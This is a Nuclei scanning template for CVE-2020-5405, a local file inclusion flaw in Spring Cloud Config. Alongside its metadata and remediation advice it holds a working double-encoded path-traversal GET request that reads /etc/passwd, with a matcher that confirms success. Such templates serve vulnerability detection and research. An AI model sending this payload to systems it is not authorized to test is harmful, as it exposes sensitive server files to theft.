Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
PoC代码[已公开]
id: CVE-2020-5405
info:
name: Spring Cloud Config - Local File Inclusion
author: harshbothra_
severity: medium
description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
remediation: |
Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.
reference:
- https://pivotal.io/security/cve-2020-5405
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
- https://github.com/Secxt/FINAL
- https://github.com/pen4uin/vulnerability-research-list
- https://github.com/sobinge/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2020-5405
cwe-id: CWE-22,CWE-23
epss-score: 0.69694
epss-percentile: 0.98619
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vmware
product: spring_cloud_config
tags: cve2020,cve,lfi,springcloud,vmware
http:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100e782bf293791e75aa5a4338a161a198e2c3cab401d5786b7177c747d98269e5d022100a40811b25d125424c2c98c7ddbb527ce71c99c48d2ef7c328cc23dd3a77dd287:922c64590222798bb761d5b6d8e72950